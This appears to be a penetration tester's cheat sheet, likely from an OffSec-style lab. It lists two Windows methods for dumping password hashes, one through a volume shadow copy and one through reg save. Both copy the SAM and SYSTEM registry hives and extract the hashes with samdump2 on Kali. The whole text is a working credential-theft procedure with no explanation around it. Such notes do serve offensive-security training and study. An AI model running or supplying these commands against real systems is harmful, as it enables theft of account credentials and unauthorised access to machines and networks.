Shadow Copy
-
Run:
wmic shadowcopy call create Volume='C:\' -
List the created copy:
vssadmin list shadows -
Copy SAM out (change based on 2):
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\offsec.corp1\Downloads\sam -
Copy SYSTEM as well (change based on 2):
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\offsec.corp1\Downloads\system -
Extract hashes on Kali:
samdump2 system sam
Reg save
-
Copy SAM:
reg save HKLM\sam C:\users\offsec.corp1\Downloads\sam -
Copy SYSTEM:
reg save HKLM\system C:\users\offsec.corp1\Downloads\system -
Extract hashes on Kali:
samdump2 system sam